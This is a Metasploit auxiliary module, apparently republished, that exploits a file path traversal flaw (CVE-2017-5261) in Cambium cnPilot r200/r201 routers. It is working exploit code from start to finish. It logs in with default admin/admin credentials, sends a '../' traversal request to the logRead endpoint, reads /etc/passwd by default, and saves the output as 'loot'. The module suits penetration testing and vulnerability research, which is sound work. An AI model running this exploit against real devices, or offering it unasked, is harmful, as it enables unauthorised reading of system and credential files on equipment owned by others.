Cambium CnPilot R200/r201 File Path Traversal

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::CNPILOT  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Cambium cnPilot r200/r201 File Path Traversal',  
'Description' => %q{  
This module exploits a File Path Traversal vulnerability in Cambium  
cnPilot r200/r201 to read arbitrary files off the file system. Affected  
versions - 4.3.3-R4 and prior.  
},  
'Author' => [  
'Karn Ganeshen <KarnGaneshen[at]gmail.com>'  
],  
'References' => [  
['CVE', '2017-5261'],  
['URL', 'https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/']  
],  
'License' => MSF_LICENSE  
)  
)  
  
register_options(  
[  
OptInt.new('TIMEOUT', [true, 'HTTP connection timeout', 10]),  
Opt::RPORT(80), # Application may run on a different port too. Change port accordingly.  
OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'admin']),  
OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'admin']),  
OptString.new('FILENAME', [true, 'Filename to read', '/etc/passwd'])  
], self.class  
)  
  
deregister_options('DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'PASS_FILE', 'BLANK_PASSWORDS', 'BRUTEFORCE_SPEED', 'STOP_ON_SUCCESS')  
end  
  
def run_host(_ip)  
unless is_app_cnpilot?  
return  
end  
end  
  
#  
# Read file  
#  
  
def read_file(the_cookie)  
print_status("#{rhost}:#{rport} - Accessing the file...")  
file = datastore['FILENAME']  
fileuri = "/goform/logRead?Readfile=../../../../../../..#{file}"  
final_url = (ssl ? 'https' : 'http').to_s + '://' + "#{rhost}:#{rport}" + fileuri.to_s  
  
res = send_request_cgi(  
{  
'uri' => fileuri,  
'method' => 'GET',  
'cookie' => the_cookie,  
'headers' => {  
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'  
}  
}  
)  
  
if res && res.code == 200  
results = res.body  
  
if results.empty?  
print_status('File not found.')  
else  
print_good(results.to_s)  
  
# w00t we got l00t  
loot_name = 'fpt-log'  
loot_type = 'text/plain'  
loot_desc = 'Cambium cnPilot File Path Traversal Results'  
data = results.to_s  
p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)  
print_good("File saved in: #{p}")  
end  
else  
print_error("#{rhost}:#{rport} - Could not read file. You can manually check by accessing #{final_url}.")  
return  
end  
end  
  
#  
# Login & initiate file read  
#  
  
def run_login  
cookie, _version = do_login(datastore['USERNAME'], datastore['PASSWORD'])  
if cookie == 'skip'  
return  
else  
read_file(cookie)  
end  
end  
end  
`